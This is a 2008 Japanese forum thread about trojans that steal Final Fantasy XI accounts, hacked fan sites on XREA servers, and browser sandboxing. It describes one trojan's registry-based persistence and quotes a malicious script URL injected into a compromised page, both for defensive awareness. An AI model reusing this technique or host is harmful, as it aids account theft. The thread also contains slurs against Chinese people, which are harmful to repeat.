220 名前:既にその名前は使われています:2008/08/22(金) 02:50:07 ID:ZYeWgzKk
俺はさOpera使ってるんだけどJavaScriptはオフにしてるわけよ
でもこんなの強制的にオンにするウィルスがあれば意味ないよな

221 名前:既にその名前は使われています:2008/08/22(金) 02:53:18 ID:rE0/E4WD
>>220
そんなのオンにするくらいなら素直にネトゲのアカや
クレカの番号抜くだろ、ウイルス作る側としては。

222 名前:214:2008/08/22(金) 02:59:50 ID:A1sU3tG3
>>218
説明ありがとうございます。パソコンとか詳しくなく
それがどー言ったものかも分かりません・・。
それは説明書に書かれてる一般のリカバリとは異なるものでしょうか?
また、サンドボックスとは何でしょうか・・・?
「スレでも度々話題に出てる」お手数かけて 申し訳ございませんm(_ _)m


223 名前:既にその名前は使われています:2008/08/22(金) 03:12:43 ID:EewF4yy2
SandBoxie使用と>>218の設定で対応できるケース。

FlashPlayerの脆弱性などを利用しOSに対して悪性コードを実行し、OSの機能の中に垢パクマルウェアを注入するアレ。
・ブラウザを砂箱化して動かすことにより、その中で行われたOSの設定変更はユーザが自分で手動リカバリをかけてOSに適用していかなければないため、
 悪意の第三者による改ざんをユーザが感知しない状況で行われることを防ぐことができる。

例) wzcsvbxm.dllの場合
 ドロッパ(名称定義名共に不明)から生成され、system32フォルダに注入。
 同時?にHKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parametersに対してエントリをwzcsvbxm.dllへ改ざんする。
 これにより次回起動時からwzcsvbxm.dllがwuauservというサービスとしてシステムに常駐してPOLを監視、POLのプロセスをみつけるとPOLに業者鯖へIDを送信するスレッドを注入する。

 ブラウザ砂箱化することによりもしこれに感染したとしても、感染しているのは砂箱内で完結するため。OSに対してはユーザが自分でリカバリーかけなければ適用されることはない。
 ということは、OS起動時にwzcsvbxm.dllが常駐起動かけられることもないし、そもそもwzcsvbxm.dllが砂箱外のsystem32フォルダに作られることもない。
 また砂箱は、適宜内容を消去することができるためブラウジングが終わったら内容を消去することができる。

224 名前:既にその名前は使われています:2008/08/22(金) 03:13:56 ID:rE0/E4WD
>>222
>FlashPlayerって何でしょうか・・・?
>サンドボックスとは何でしょうか・・・?
      _______                     __
    // ̄~`i ゝ                    `l |
    / /        ,______   ,_____    ________  | |  ____ TM
   | |     ___ // ̄ヽヽ // ̄ヽヽ (( ̄))   | | // ̄_>>
   \ヽ、   |l | |    | | | |    | |  ``( (.  .| | | | ~~
      `、二===-'  ` ===' '  ` ===' '  // ̄ヽヽ |__ゝ ヽ二=''
                         ヽヽ___//   日本
  _____ _____  ______  _______
  |  ウェブ  | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ._________________
      |サンドボックス              │・検索オプション
      └────────────────┘・表示設定
         | Google検索 | I'm Feeling Lucky |  ・言語ツール
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ○ウェブ全体から検索 ◎日本語のページを検索

225 名前:既にその名前は使われています:2008/08/22(金) 03:20:19 ID:EewF4yy2
ここまで書いて眠くなった罠。

>>222
サンドボックス=砂箱っていうのは、現在使ってるOSから隔離されたテスト環境を作るものなのねー。
超簡単にいえば、222の使っているブラウザとその設定のクローンを作って、そのクローンでエロサイトなりなんなり見にいくことができるというか。
クローンで感染しても、222が自分でその書き換えられた設定をクローンから実ブラウザに適用しなければ実ブラウザに対する変更はされないわけ。
例でいえば、砂箱化したブラウザでブックマークを新しく追加したとしても、それをリカバリーかけて実ブラウザに適用しないかぎり、実ブラウザ側には何にも登録されないわけ。
あれだ。ジョジョでいえばゴールドエクスペリエンスだ。

226 名前:既にその名前は使われています:2008/08/22(金) 03:25:17 ID:A1sU3tG3
難しいですね><
簡単に言うと防波堤?ダミー?置いとくって事ですか?
文面見た感じでは、ウイルスが入ってきた時に対して効果ありって事ぽいのかな



227 名前:既にその名前は使われています:2008/08/22(金) 03:26:14 ID:EewF4yy2
それと砂箱化されたプログラムから呼び出されたプログラムもまた砂箱化されて実行されるので、
ぶっちゃけていえばブラウジングおわったら砂箱クリアすれば、毎回クリーンなブラウザでエロサイトみにいけるじゃん?ってことw
当然、既に感染してる場合はどーしようもないけどw

んで、>>218の設定でPOLのディレクトリとレジストリキーをアクセス排他してるのは。
過去にあった事例の、レジストリキーからパスワード保存ファイルの位置を特定してそいつを送信するっていう手法に対応したもの。
218の設定したら、POLのディレクトリとレジストリキーをエクスプローラなりレジストリエディタなりで見にいってみるといい、ちゃんとアクセス排他される。


228 名前:既にその名前は使われています:2008/08/22(金) 03:28:44 ID:EewF4yy2
>>226
ダミーっていうか、保存用と観賞用の2冊買うというか。

229 名前:既にその名前は使われています:2008/08/22(金) 03:36:45 ID:A1sU3tG3
>>227
お時間とらせちゃって すみませんでした・・。
ご丁寧な説明 ほんとありがとうございましたm(_ _)m
がんばってみます。
後、男性用アニメはうといので「ジョジョでいえばゴールドエクスペリエンスだ。」
の表現はわかrませんが、>>226っぽいですね、理解はできました


230 名前:既にその名前は使われています:2008/08/22(金) 03:42:05 ID:EewF4yy2
もちろん、FWやらHIPSやらAntiVirusやらインスコってOSのパッチあてて、設定もビシーっとしている状況で砂箱を使うのが前提だよ。
砂箱でブラウジングしてるからって超安全wwwシナチクプギャーwwwってことじゃないからねー。
あくまで、ブラウジングに関して生ブラウザで見に行くよりは安全じゃね?って程度に受け止めておくと幸せかもよ。
それと砂箱の仕様上メモリの読み取りはある程度できるわけだから、そこも頭にいれておくべきかしらんw

あれだな。ひとなつの甘い経験で行きずりのナオンとゴムつけてセクロスくらいにとらえておくといい。
チンコマンコだけが病気の感染源じゃないわけだしなw

231 名前:既にその名前は使われています:2008/08/22(金) 04:21:19 ID:EewF4yy2
テンプレにあるツールとか、設定とかなんだ。
たまーに「こんなのマニア向けだろ、目的と手段が入れ替わってんじゃね。つーか意味わかんねーお;;」
とか言う人もいるんだけど、そういうマニア趣味な奴もいるだろうが、
ある程度知識のある人間がここまでしないとちょっと安心できないって事でもあるのよねー。
各人のOSの環境なんて十人十色なわけだし、これがベストな設定!って出せないからね。そこは頑張ってもらうしかないけども。
その中でも、そういった人たちが使ってるソフトやツールを参考にして、自分の環境にあったものをチョイスしていくことが、
OSを最新状態に保つ+αのセキュリティ強度を目指す上で重要なことだよ。FF11プレイ環境に限った話じゃなくねw

と、スレ保持300なったぽいので日記書いてラスト保守。【おやすみなさい。】

232 名前:既にその名前は使われています:2008/08/22(金) 04:44:00 ID:LGCZkWhc
いちおう書いておきます(テンプレ作った人です)
はっきり言ってココに来るまではま〜〜〜〜ったくのセキュリティ音痴でした
Spybot?なにそれ、PG2?なにそれ、HIPS?なにそれ・・・みたいな・・・
でもいまは、とりあえず「ん?なんだかな〜?」くらいのレベルには来てます
と、自分自身で信じたいです・・・w
まだたまに「おまえはあふぉか!」みたいなことをここに書いてるときも
あったりしますが・・・

ごめんなさいm(_ _)m

なんでもそうですけど、自分に合わせた勉強は必要です
と、わたしは思ってます

とにかく調べる、とにかく試す、なんでもやってみること、これ大事

だめだったらクリーンインストールしてリカバリーすればいいだけじゃ〜ん
とか言うわたしは、まだクリーンインストールの経験がありません(ぉ
テンプレに書いてあるものは、マニア向けのセキュリティだとは思ってません
そのおかげでウィルスに感染しない環境ができていると、わたしは思ってます
テンプレに書いてある程度のことは、自分で調べれば解決できるレベルです

233 名前:既にその名前は使われています:2008/08/22(金) 05:47:07 ID:/CoLUCwJ
どうでもいいけど一回ハックされたやつのPOLIDは業者に控えられちゃってるよな?

業者がローラーでパスを適当に打ちまくってビンゴしちゃったらPSでもアウト。
POLIDは変更不可能だし。
これは防げないのかな。

234 名前:既にその名前は使われています:2008/08/22(金) 06:13:30 ID:aEA8xu6L
>>233

次から次へとハックできてんのに、いちいち何兆パターンもやるわけないだろ。
リアル10年くらい時間かかってしまう。3回縛りがあるからな。

235 名前:既にその名前は使われています:2008/08/22(金) 06:17:13 ID:LGCZkWhc
データ落ち回避上げ

236 名前:既にその名前は使われています:2008/08/22(金) 06:32:42 ID:3T0gTVzx
PG2とカスペルスキーの相性最悪だからなぁ

237 名前:既にその名前は使われています:2008/08/22(金) 06:42:02 ID:H0Dtbf8M
今日、地面に足が埋まってて、胴だけが地面に露出していたひとをみたんだけど
いわゆるツールつかい?

アトルガンエリアのなんとか沼の監視塔の扉の前にそのひといた

238 名前:既にその名前は使われています:2008/08/22(金) 06:46:35 ID:95DH1psG
いいえ、違います。

239 名前:既にその名前は使われています:2008/08/22(金) 06:47:31 ID:uDyZJ214
>>237
スレ違いだし、それはお前からそう見えてるだけだろ
NPCに会話中に地面にもぐったり、空に浮いたりはヴァナではよくあることだ

240 名前:既にその名前は使われています:2008/08/22(金) 06:47:50 ID:bsVBl9wA
いいえ、ケフィアです。

241 名前:既にその名前は使われています:2008/08/22(金) 06:55:38 ID:t3lOP7AB
ほし

242 名前:既にその名前は使われています:2008/08/22(金) 07:47:02 ID:TPJbL9Cz
DHC://wbc

243 名前:既にその名前は使われています:2008/08/22(金) 08:11:13 ID:m6WsB2Ch
>>217
ここの住人は、今すぐ中規模企業くらいのシステム管理でもできそうなくらいの知識ありそうだけど、
(ルーターの複雑な設定とかは知らんが、セキュリティに関しては1級クラスだw)
いっぱんじーんの認識なんて、ウイルスそふといれればおkだよね?程度だ。
フラッシュプレーヤー知らなくてもしょうがないレベル。
そのレベルの人は、FF専用PCなんて用意するわけも無く。

だからこそ、■eには、ワンタイムパスワードとかもっと高度な対応を早くして欲しい。


244 名前:既にその名前は使われています:2008/08/22(金) 09:38:02 ID:uFJHzjuJ
>>206
>FlashPlayerって何でしょうか・・・?

テンプレも読まないで質問するバカ
ググることすらしないクズ
>フラッシュプレーヤー知らなくてもしょうがないレベル。
って以前の問題じゃね

245 名前:既にその名前は使われています:2008/08/22(金) 09:41:20 ID:uFJHzjuJ
今度からスレタイ
●● RMT業者の垢ハックが多発している件37 ●●【テンプレ必読】
とでも書いた方がいいわ
「PC詳しくないんです;;」とか言うくせにテンプレ読まないバカ多すぎる
せっかく張ってくれてんのに何なの

246 名前:既にその名前は使われています:2008/08/22(金) 09:47:10 ID:CivXSnP3
詳しくない人にはちんぷんかんぷんなテンプレなんだよなあ

247 名前:既にその名前は使われています:2008/08/22(金) 09:55:30 ID:gYw/jHGU
テンプレがちんぷんかんぷんなら
ここで何きいても理解できないとおもわれる。

248 名前:既にその名前は使われています:2008/08/22(金) 09:57:04 ID:rnJy5SKT
>>246
初めから詳しい奴なんかいねぇんだからこれを機に覚えろって
テンプレなんか少しでもググればわかるような用語しかねーし
つーか初心者ですとか詳しくないんですって奴ほどググらないんだよな

249 名前:既にその名前は使われています:2008/08/22(金) 09:57:07 ID:6pvgYEl2
詳しくない奴がPCを使うのは、カタコト英語がやっとの日本人観光客が非英語圏に旅行するのと同じ

そんな奴は旅行に行くな、PCを使うなってことだ

250 名前:既にその名前は使われています:2008/08/22(金) 09:59:12 ID:m6WsB2Ch
まーテンプレの内容を、どうかみ砕いたって初心者にすぐ理解させるのは無理と思う。
ただ、やっぱり理解する努力はして欲しいけど。

それでわからなかったらその部分を質問すると親切回答が多いのはどのスレも同じだな。

ネットワークやセキュリティに詳しいのは、一般人に対するアドバンテージw なんだから、
詳しい人だけでも自己防衛がんばって欲しい。

私は、某企業の一部部門のシステム管理の真似事してるが、
はっきりいってこの板のほうが何倍もレベルたけぇww

企業の場合は、抜かれないようにするのはもちろんだけど、抜かれても良いようにするって対策も可能だからな・・・
■にも、その方向も含めた対策をして欲しい。

251 名前:既にその名前は使われています:2008/08/22(金) 10:01:23 ID:ZLBXJk48
>>249 こういうのはメリポふってからメリポ稼ぎこいってくらい
滑稽に感じる。

252 名前:既にその名前は使われています:2008/08/22(金) 10:02:15 ID:m6WsB2Ch
というか、もともとFFXIって理系の業界人多いからな・・

253 名前:既にその名前は使われています:2008/08/22(金) 10:03:09 ID:m6WsB2Ch
今気づいたが、なかなか良いIDのワタシ

254 名前:既にその名前は使われています:2008/08/22(金) 10:12:06 ID:rnJy5SKT
>>249
その例えなら片言英語しか出来ないのに非英語圏に旅行して
身振り手振りや筆談等でなんとかコミュニケーション取ろうとする気もなく
現地の人に日本語でおkと言いまくる変な奴だな

255 名前:既にその名前は使われています:2008/08/22(金) 10:12:48 ID:tkvdgG9S
PS3でFF11をやっていてもアカウントハックされるんだってね
メールを受信したらガガガ・・・
ってなってアカウントハックにあったそうです

256 名前:既にその名前は使われています:2008/08/22(金) 10:18:45 ID:uFJHzjuJ
>>255
>メールを受信したらガガガ・・・
>ってなってアカウントハックにあったそうです

わーすごいねー(棒)
釣りですらこのレベルしか書けねえってどんだけ低脳よ


257 名前:既にその名前は使われています:2008/08/22(金) 10:23:12 ID:m6WsB2Ch
>>256
超ベテランの専門家でもそういうやつ居るw
専門用語バリバリの高度な話じゃ、相手がついてこれないかもって易しく言おうとすると
いきなり幼児語化する。。。



私のことなんだがw 経験年数だけはベテランだぜ;;

258 名前:既にその名前は使われています:2008/08/22(金) 10:28:20 ID:m6WsB2Ch
でも文系人間にはそれで通じたりするから怖い。。。てか奴ら聞くだけ聞いて理解する気0だからな。
だいたいのかんじwを伝えればおk。

259 名前:既にその名前は使われています:2008/08/22(金) 11:05:45 ID:bxZId0qP
xreaって社員20人ぐらいで30万サイト管理してるのか・・


260 名前:既にその名前は使われています:2008/08/22(金) 11:15:04 ID:F/aL7iWO
>>258
255なんて、だいたいのかんじwすら伝わってねーよwwww

261 名前:既にその名前は使われています:2008/08/22(金) 11:26:31 ID:vQFS+MH6
>>255
いいたいことがよく分からないけど
PS3もPCと変わらない部分があるから感染していると

「さーメールをチェックしようか。まずはPOLにつないで」
ピーガー……ピ! ピ! ピ! ガリガリガリ(PS3からの異音)
(あるぇー……こんな音したっけ? いつの時代? テレホの時代? モデムつないでないよ!)
数日後、ぼくちん垢とられてましたorz

みたいなことがあると

262 名前:既にその名前は使われています:2008/08/22(金) 11:29:09 ID:7wm8h2pd
まぁ、多分HDDのアクセス音が異常な程あり、おかしいって言いたいんだろうなw

263 名前:既にその名前は使われています:2008/08/22(金) 11:33:14 ID:o6cyk3lF
xreaって何ですかぁ〜♪教えてくださいぃ〜w

264 名前:既にその名前は使われています:2008/08/22(金) 11:37:59 ID:P8e7PR3h
        ,.-─ ─-、─-、
      , イ)ィ -─ ──- 、ミヽ
      ノ /,.-‐'"´ `ヾj ii /  Λ
    ,イ// ^ヽj(二フ'"´ ̄`ヾ、ノイ{
   ノ/,/ミ三ニヲ´        ゙、ノi!
  {V /ミ三二,イ , -─        Yソ
  レ'/三二彡イ  .:ィこラ   ;:こラ  j{
  V;;;::. ;ヲヾ!V    ー '′ i ー ' ソ
   Vニミ( 入 、      r  j  ,′
   ヾミ、`ゝ  ` ー--‐'ゞニ<‐-イ
     ヽ ヽ     -''ニニ‐  /
        |  `、     ⌒  ,/
       |    > ---- r‐'´
      ヽ_         |
         ヽ _ _ 」

     ググレカス [ gugurecus ]
   (西暦一世紀前半〜没年不明)

265 名前:既にその名前は使われています:2008/08/22(金) 11:40:43 ID:o6cyk3lF
>>264
こんなaaあるんだw知らなかったw

266 名前:既にその名前は使われています:2008/08/22(金) 11:40:50 ID:WPfU0L8p
>>263
ペケレアっていう12歳の女の子3人組。10月デビュー予定。

267 名前:既にその名前は使われています:2008/08/22(金) 11:42:39 ID:o6cyk3lF
>>266
なるほど〜wファンクラブの方ですか?

268 名前:既にその名前は使われています:2008/08/22(金) 11:43:04 ID:7wm8h2pd
>>265
ttp://dokoaa.com/upre.html

いっぱいあるぞ

269 名前:既にその名前は使われています:2008/08/22(金) 11:44:39 ID:WPfU0L8p
>>267
デビュー曲「ドッ☆彡キュン♪恋のアカハック」をよろしくね!

270 名前:既にその名前は使われています:2008/08/22(金) 11:45:31 ID:P8e7PR3h
       ,.r''-'''""'''ー-、_
    、r゛"   "'''' -=、,. ヾ''、
    ,r'          .:'r ;::::ヽ
  ri'             :.:::::ミ.:::::::::::i
.  l           :,:::::ミ::::::::::::i
.  l           ..::::::l::::::::::::l
  ,ljii;;;,,,__ ; :,__,,.-_=_、ミ、::::::i;:::::::;r.、
.  r'´(て)ヾ,_j' '´`='ヽー.'::::::::::.r' i i
  l、  ̄ ,ノ .:::ヽ _,ノ  ..:::::::::::! l/
.  !  ̄ :'   ::::::..    .::::::::::::::! '!
   l    ヽ,_;::::::,:',_、 .::' .:;'::':i_,/
   ! r';"';';;;;,'':::;'';;::.:ミ.、::r ':;:r:::!
   Y;;';.r‐'''‐'‐'':;';;:ミ ..:ミ:'::::'::::l 、
    'ヾ ",:,:';:: 、ヾ、 ミ、ミ:;:::::::;r' l:::ヽ
     ミ'; ::';;:;:;:.,、:、;.、 r'- '´ ,:'::::::::`
     ヾ'"!r;,'l;;rヾヾ''"   /::::::::::::::
     / ヾ'/     _,.-/´::::::::::::::::::::
    '--,-r'l__,r '´ /;::::::::::::::::::::::::::
   カー・コローグ・ヨメ[Kar cologe yomet]
         (1885〜1948 独)

271 名前:既にその名前は使われています:2008/08/22(金) 11:47:59 ID:7Gf6O8Hg
>>270
調子のんなカス

272 名前:既にその名前は使われています:2008/08/22(金) 11:48:25 ID:o6cyk3lF
>>269
恋にアカウントがあるのか!?とつっこんでみるw
そして盛大な釣られ方でうれしいですw
変なaaいっぱいあるんだ・・・作ってる人暇なんでしょうね

273 名前:既にその名前は使われています:2008/08/22(金) 11:52:37 ID:vQFS+MH6
>>272
馬鹿、お前の馬鹿それは

「恋しちゃったの。でも彼はいつも**さんの話題ばかり
 そうだ**さんになればいいんだ。彼女からアカウントを盗んでやる」

という禍々しく邪悪なオーラが漂っているんだよ!

274 名前:既にその名前は使われています:2008/08/22(金) 11:54:38 ID:o6cyk3lF
あなたの心のアカウント、いただきました♪

275 名前:既にその名前は使われています:2008/08/22(金) 11:55:19 ID:7wm8h2pd
釣られ方と言うか、あまりに酷い餌っぷりで食い付いてあげないと可哀想になってくる。

276 名前:既にその名前は使われています:2008/08/22(金) 11:57:15 ID:P8e7PR3h
>>271
         巛ミヾヾ  \
       /   ミ     ヽ
       f,    ミ       }
     ┏v'┳_━━━ r、    |
     yバノ゙’' ̄ '''  } }゙    }
     ‘ーj`'    :  //   /
      L_ヽ  i  V   /
     ("  ` !      _/
      \ _,. -‐ '  ̄  !_
      /|~   /  ̄    \

    ヒッシ・ダナー [Hissy Danner]
     (1901〜1997 イギリス)

277 名前:既にその名前は使われています:2008/08/22(金) 11:57:19 ID:o6cyk3lF
>>275
ショック!

278 名前:既にその名前は使われています:2008/08/22(金) 11:59:57 ID:vQFS+MH6
もうネタがないから混沌としているな
で、来年の夏もまたスパイウェア騒ぎになるんだろうな
■が続けていればの話だが

279 名前:既にその名前は使われています:2008/08/22(金) 12:01:23 ID:iB6Vin1V
保守

280 名前:既にその名前は使われています:2008/08/22(金) 12:01:28 ID:7wm8h2pd
結局、対策もある程度出尽くしちゃった感があるし、
ウィルスもイタチごっこだし、動きが何もないからなぁ。

281 名前:既にその名前は使われています:2008/08/22(金) 12:02:47 ID:vQFS+MH6
保守age

282 名前:既にその名前は使われています:2008/08/22(金) 12:10:48 ID:o6cyk3lF
次に狙われるサーバーはどこかw
sakuraがやばそう?
ハックくらってからどもサーバーも怖くてFF攻略HPが見れないです

283 名前:既にその名前は使われています:2008/08/22(金) 12:36:38 ID:abIXRkq4
P8e7PR3hって俺っておもすれーとでも思ってるのかね・・・w

284 名前:既にその名前は使われています:2008/08/22(金) 12:37:05 ID:P8e7PR3h
>>283
しらね。本人に聞け。

285 名前:既にその名前は使われています:2008/08/22(金) 12:41:07 ID:abIXRkq4
近年まれに見る厨か、素直にNG登録するか

286 名前:既にその名前は使われています:2008/08/22(金) 12:45:10 ID:bFFb+UpR
新種でてくるまでは、
このサイトは現在感染中で危険、とかリスト作って貼るとかかね
修復したサイトでもウェブポータルのような例もあるしなあ

287 名前:既にその名前は使われています:2008/08/22(金) 12:48:53 ID:uDyZJ214
週末により中華がXREA改竄中

処置をしてないPCで見に行くこと無かれ
取り合えず忍テンプレはまたやられたっぽい

288 名前:既にその名前は使われています:2008/08/22(金) 12:58:25 ID:Wu/Yx2p7
>>282
sakuraは元からやばいだろ
6月のxrea広告もsakuraの鯖だったし
5月にはsakuraの鯖ハックされてウイルス撒き散らしてたし

289 名前:既にその名前は使われています:2008/08/22(金) 13:03:44 ID:Wu/Yx2p7
忍テンプレやられてるな
nin-index.html に tp://1039045744:88/jp.js のスクリプト埋め込まれてる

290 名前:既にその名前は使われています:2008/08/22(金) 13:10:04 ID:CzNZ1af7
黒魔メモも また仕込まれてるの確認。


291 名前:既にその名前は使われています:2008/08/22(金) 13:15:20 ID:L7yvBcyE
うーん、酷いなぁ

292 名前:既にその名前は使われています:2008/08/22(金) 13:15:42 ID:diH02zn5
やばいねえ・・・
各地のサーバーがここまで穴だと手の打ちようがないぞ。
ここみてる奴ならまだしも普通に検索でたどり着く一般人は・・・
2chとかの垢ハック関係を見ていない人のほうが、
やられる率が高くなるという危険きわまりない状態。

293 名前:既にその名前は使われています:2008/08/22(金) 13:16:14 ID:uDyZJ214
取り合えず週末狙ってくるから注意発起を身の回りだけでも

XREAはダメだなこの調子じゃ、まさにイタチゴッコ

294 名前:既にその名前は使われています:2008/08/22(金) 13:20:28 ID:diH02zn5
もう完全にルートを取られてるか致命的な穴があるとしか。
鯖管理側が把握できていないって相当やばいのだが。


295 名前:既にその名前は使われています:2008/08/22(金) 13:21:22 ID:P37X5bXp
■がパスに業界初の指紋認証導入すれば全て解決

296 名前:既にその名前は使われています:2008/08/22(金) 13:23:40 ID:3T0gTVzx
そろそろ現パスに変えてから1ヶ月経つから、PS2版起動させてパス変えてくるかな

297 名前:既にその名前は使われています:2008/08/22(金) 13:23:45 ID:vQFS+MH6
もう面倒だから次の対策でいいの?

画像・音声・映像をDLしない
フレーム不許可
スクリプト不許可
火狐のアドオンは使うな

穴ありまくりというか想定できなかった穴なんじゃないかな
あくまでネトゲのキーロガーだけだからベンダーの騒ぎは小さいんだろう
尼とかからカードキーを盗むレベルくらいになればマジになるだろうし

298 名前:既にその名前は使われています:2008/08/22(金) 13:30:40 ID:ufR9Jphy
なんで炎狐のアドオンが駄目なんだ?

アドオンの穴を気にしてるって事なの

299 名前:既にその名前は使われています:2008/08/22(金) 13:35:05 ID:vQFS+MH6
>>298
そうなんだが気にしてもだめか
なんかあっても気にしなかったが
やっぱり気にしたほうがいいかなと思って

300 名前:既にその名前は使われています:2008/08/22(金) 13:37:07 ID:gYw/jHGU
>>295
登録したISP以外での接続不可。
当然串も。

301 名前:既にその名前は使われています:2008/08/22(金) 13:37:37 ID:gYw/jHGU
で、いいんじゃないか。
と、書こうとして>>300を途中で書き込んでもうた。

302 名前:既にその名前は使われています:2008/08/22(金) 13:48:06 ID:JZzgTzie
例のレジストリ書き換え型の検出に使うdatなんですが、
wuaueng.dll
となっています

以前にVistaやXPでも自動更新とめている場合はテンプレと変わるという話を聞いた気がするのですが、
それはこのdllであってますでしょうか?

303 名前:既にその名前は使われています:2008/08/22(金) 13:48:16 ID:rE0/E4WD
>>289
忍者と詩人はやられてなかった。
黒魔はやられてるけど。

んで昨夜のXREAトロイの新型(手持ちではこれで11世代目)。
ttp://www.virustotal.com/analisis/9df360d1267cedb378cce5418a92bb99
初見での撃墜はDr.WEB、OneCare、Sophos、VBA32。各社に検体送付済み。

304 名前:既にその名前は使われています:2008/08/22(金) 13:50:26 ID:gYw/jHGU
sageるなage

305 名前:既にその名前は使われています:2008/08/22(金) 13:56:22 ID:7r1LVkFp
>303
忍者テンプレやられてたぞ
あと便利ガイドも

306 名前:既にその名前は使われています:2008/08/22(金) 13:56:26 ID:diH02zn5
11代目って下手なOSパッチより手厚いバージョンアップだなw
シナチクちね!

307 名前:既にその名前は使われています:2008/08/22(金) 14:00:51 ID:WYkZwR4m
そしてまたGM会議でコール駄目か
狙ったように金曜日にやるな


308 名前:既にその名前は使われています:2008/08/22(金) 14:02:47 ID:CzNZ1af7
忍は ジョブ板みたら修正したみたいです。
今回も改ざんは.cssの模様。
忍テンプレは つくりに問題がちょいありだけどxreaの規約違反してるから 強く押せないんだよねぇ。
黒魔wikiは .htaccess修正してるんだよなぁ。
改ざんされたサイトの管理人さんがもう少し具体的にアクセスログとか情報出してくれるといんだけど
WebPortalはチカッパなのに ブログみるとXREAの案件って思ってる人も多いし
このままだと XREAがアウトって感じになってまうわなぁ・・

309 名前:既にその名前は使われています:2008/08/22(金) 14:05:32 ID:o6cyk3lF
ps持ってる人は、金曜日にパスかえたほうがいいかもね

310 名前:既にその名前は使われています:2008/08/22(金) 14:19:21 ID:7r1LVkFp
>308
WebPortalってチカッパ側からなんか発表あったっけ?


311 名前:既にその名前は使われています:2008/08/22(金) 14:35:07 ID:rE0/E4WD
>>310
FFXI Web Potal 管理人じゅんたるです。
リニューアルに伴い、ホームページをいったん閉鎖させていただきます。
ご迷惑をおかけいたしますが、よろしくお願いいたします。
2008年8月15日(金曜日)

こんだけ。

312 名前:既にその名前は使われています:2008/08/22(金) 14:53:43 ID:CzNZ1af7
>>310
チカッパ運営側からはリリースされてないとおもう。
チカッパのphpは古い4系でデフォルトだと脆弱性が認識されてるやつ。
(更新予定はないらしい。内部設定は使ってないからわからん)
で WebPortalでつかってたXoopsのモジュールも多分脆弱性が確認されてるやつ。
普段サイト見る人はレン鯖気にしないけど
URLにxrea.com使ってるサイトは 数がぱねぇわけで 前回の対処のまずさもあるし目立つよね。
わざわざ ドメインからサーバ調べる物好きも少ないだろうから
XREA「だけ」が危険ってイメージついたほうが他のレン鯖屋はうれしいだろうし
今回は ユーザー側の設定+ユーザの設定ってとこがあるから
鯖屋だけのせいじゃないって言い訳も可能。
ちなみに チカッパはロリポとおなじ鯖屋 どっちもさくらの再販
レン鯖板みると ロリポに大規模な脆弱性があるって主張してるやつがいてIPAに届け出も出してるらしい。

作ってるほうも 無頓着ってかさ ぱっとみで穴がすぐ見つかるサイトも多数ある。
今回はサイト持ってる身としてはいろいろ考えさせられるよ ほんと。

313 名前:既にその名前は使われています:2008/08/22(金) 14:58:38 ID:vQFS+MH6
つまりアレか。phpで動かさず、改ざんすると読めなくなるXML最強ってことか?
IE非対応だけど俺は今日からXMLにするぜ! よっしゃー!

314 名前:既にその名前は使われています:2008/08/22(金) 15:01:20 ID:7r1LVkFp
どこかで読んだ話だがサイト管理者のスキルが足りてないよな
お手軽に公開は出来るが維持することのリスクについて解っていない

315 名前:既にその名前は使われています:2008/08/22(金) 15:02:21 ID:rE0/E4WD
XMLは別にIEでもいけるべ。
XHTMLをデフォルトでは受け取らないだけで。

# 大昔みたいに静的HTMLをシコシコ書いてFTPでアップが最強!

316 名前:既にその名前は使われています:2008/08/22(金) 15:09:13 ID:XWZPpgPG
>295
俺がFFやってるマシン、指紋認証なんだが、
昨日全然認証してくれなかったから、それだと焦るな・・・

317 名前:既にその名前は使われています:2008/08/22(金) 15:14:19 ID:7r1LVkFp
>312を読むとブログサービスを使ってた方が安全な気がするわ。
RSSでしか読まないのが安全だね。

318 名前:既にその名前は使われています:2008/08/22(金) 15:17:55 ID:CzNZ1af7
あちゃ 訂正
×今回は ユーザー側の設定+ユーザの設定ってとこがあるから
○今回は サーバー側の設定+ユーザの設定ってとこがあるから

319 名前:既にその名前は使われています:2008/08/22(金) 15:25:56 ID:Wu/Yx2p7
ブログサービスを使ってた方が安全?wwwwwwwww

320 名前:既にその名前は使われています:2008/08/22(金) 15:33:20 ID:oX3NGc6c
くそがサブ垢が堂々と寝釣りに使われてる
早くこいウンコGM

321 名前:既にその名前は使われています:2008/08/22(金) 15:44:39 ID:7r1LVkFp
>319
ユーザの設定責任の部分が減るからな。
逆にブログサービスの方が危険な理由が知りたい。

レン鯖使ってる人のすべてがXOOPSとかPHPの脆弱性を正しく理解して
きちんとした対策を打ってるとは思えないだろ?

322 名前:既にその名前は使われています:2008/08/22(金) 15:45:11 ID:loBF6vzI
なんか注意喚起激しいけど、今回の忍テンプレ黒間メモの仕込まれたのは
NoScriptでも防げないとか?

323 名前:既にその名前は使われています:2008/08/22(金) 15:47:51 ID:9o30eNTW
糞中華死ねや

324 名前:既にその名前は使われています:2008/08/22(金) 15:49:46 ID:7CDN5l6Z
RO事情での話だけど。

>>294
XREAのサーバー設定、php.iniの設定がエラー丸出の状態なので
フルパスが判ってしまう脆弱性も持ち合わせてるしな
偶然RO系Wikiがよく利用しているプラグインの記述ミスで見つかった代物だが。

ssうpされてたのであげるけどこんな感じ
ttp://www.mmobbs.com/uploader/files/5436.jpg

このエラーを出すように仕向けて中華は特定してるのかもな。

325 名前:既にその名前は使われています:2008/08/22(金) 16:04:31 ID:yPvBRStU
>>212
>WindowsUpdateで現在リリースされているパッチを全部あてること。

windows searchというパッチがあたって検索がはやくなりましった。
裏でポニョポニョインデックス作っていて重い。
これ必要でしたか?

326 名前:既にその名前は使われています:2008/08/22(金) 16:07:22 ID:rE0/E4WD
いろんなリクエストを投げて帰ってくるメッセージでWebアプリを特定し、
その脆弱性を突くのは常套手段(SQLインジェクションなど)。
生のエラーは攻撃者にとって大きなヒントになるから
表示すんじゃねぇぇ(例:トレンドマイクロ)。

327 名前:既にその名前は使われています:2008/08/22(金) 16:08:21 ID:rE0/E4WD
>>325
あれはVistaのおこぼれの追加機能なのでパッチとは言わない。

328 名前:既にその名前は使われています:2008/08/22(金) 16:10:34 ID:yPvBRStU
>>327
即レスありがとうございます

329 名前:既にその名前は使われています:2008/08/22(金) 16:46:32 ID:CzNZ1af7
ちとスレチになる。
XREA php5系の php.iniはdisplay_errors = onだった。
